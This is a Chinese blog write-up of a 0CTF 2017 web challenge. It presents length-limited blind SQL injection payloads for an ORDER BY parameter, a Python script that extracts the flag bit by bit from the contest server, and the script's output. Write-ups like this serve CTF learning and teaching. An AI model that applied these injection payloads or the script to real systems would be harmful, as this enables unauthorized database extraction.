标签:bin rom when php request cas ctf arch org
洒家参加了0CTF 2017,做了一些题目。赛后过了好几天,看网上已经有了一些写得不错的Writeup,这里就写一写洒家的一些不一样的思路。
一些不错的Writeup
https://ctftime.org/event/402/tasks/
http://www.melodia.pw/?p=889
http://lorexxar.cn/2017/03/21/0ctf2017-web/
洒家看网上的Writeup 在拿到Hint,知道flag的表名后爆破flag的每一字节,效率可能比较低。这里是洒家比赛的时候想到的按bit爆破的方法,对于ASCII,只考虑7bit,每字节固定需要7次请求即可得到。
需要购买Erwin Schrodinger‘s Cat和Brownie。
一开始的Payload是:
case(ascii(substr((select(flag)from(ce63e444b0d049e9c899c9a0336b3c59)),1,1))div(16)mod(2))when(1)then(name)else(price)end
由于长度限制(WAF,最长100字节),修改Payload:
if(ascii(substr((select(flag)from(ce63e444b0d049e9c899c9a0336b3c59)),1,1))div(16)mod(2),name,price)
由于长度还是太长,把Price改成3也可以排序。
if(ascii(substr((select(flag)from(ce63e444b0d049e9c899c9a0336b3c59)),1,1))div(16)mod(2),name,3)
注:此处的3并不是按第3列排序,即和order by 3 作用不同,而是和 order by ‘3‘ 作用相同,和不加order by 效果相同(不知道是MySQL什么特性)
由此,最终的脚本是:
import requests
# code from https://www.cnblogs.com/go2bed/p/6607565.html s = requests.Session() cookie = {‘PHPSESSID‘:‘YOURCOOKIE‘} # add your cookie url = ‘http://202.120.7.197/app.php‘ true_str = ‘"goods":[{"id":"5"‘ false_str = ‘"goods":[{"id":"2"‘ order_by_template = ‘if(ascii(substr((select(flag)from(ce63e444b0d049e9c899c9a0336b3c59)),%d,1))div(%d)mod(2),name,3)‘ flag = ‘‘ for place_index in xrange(1, 1000): place_bin = ‘‘ for times in xrange(6,-1,-1): num = 2 ** times order_by = order_by_template % (place_index, num) params = {‘action‘:‘search‘,‘keyword‘:‘‘,‘order‘:order_by} r = s.get(url, params=params, cookies=cookie) #print r.content if true_str in r.content: new_place_bin = ‘1‘ else: new_place_bin = ‘0‘ print new_place_bin, place_bin += new_place_bin place = chr(int(place_bin, 2)) flag += place print flag if ‘}‘ in flag: break print ‘\n***** get flag *****‘ print flag
运行效果:
1 1 0 0 1 1 0 f
1 1 0 1 1 0 0 fl
1 1 0 0 0 0 1 fla
1 1 0 0 1 1 1 flag
1 1 1 1 0 1 1 flag{
1 1 1 0 0 1 0 flag{r
0 1 1 0 1 0 0 flag{r4
1 1 0 0 0 1 1 flag{r4c
1 1 0 0 1 0 1 flag{r4ce
1 0 1 1 1 1 1 flag{r4ce_
1 1 0 0 0 1 1 flag{r4ce_c
0 1 1 0 0 0 0 flag{r4ce_c0
1 1 0 1 1 1 0 flag{r4ce_c0n
1 1 0 0 1 0 0 flag{r4ce_c0nd
1 1 0 1 0 0 1 flag{r4ce_c0ndi
1 1 1 0 1 0 0 flag{r4ce_c0ndit
1 1 0 1 0 0 1 flag{r4ce_c0nditi
0 1 1 0 0 0 0 flag{r4ce_c0nditi0
1 1 0 1 1 1 0 flag{r4ce_c0nditi0n
1 0 1 1 1 1 1 flag{r4ce_c0nditi0n_
1 1 0 1 0 0 1 flag{r4ce_c0nditi0n_i
0 1 1 0 1 0 1 flag{r4ce_c0nditi0n_i5
1 0 1 1 1 1 1 flag{r4ce_c0nditi0n_i5_
1 1 0 0 1 0 1 flag{r4ce_c0nditi0n_i5_e
1 1 1 1 0 0 0 flag{r4ce_c0nditi0n_i5_ex
1 1 0 0 0 1 1 flag{r4ce_c0nditi0n_i5_exc
1 1 0 1 0 0 1 flag{r4ce_c0nditi0n_i5_exci
1 1 1 0 1 0 0 flag{r4ce_c0nditi0n_i5_excit
1 1 0 0 1 0 1 flag{r4ce_c0nditi0n_i5_excite
1 1 0 0 1 0 0 flag{r4ce_c0nditi0n_i5_excited
1 1 1 1 1 0 1 flag{r4ce_c0nditi0n_i5_excited}
***** get flag *****
flag{r4ce_c0nditi0n_i5_excited}
标签:bin rom when php request cas ctf arch org
原文地址:http://www.cnblogs.com/go2bed/p/6607565.html
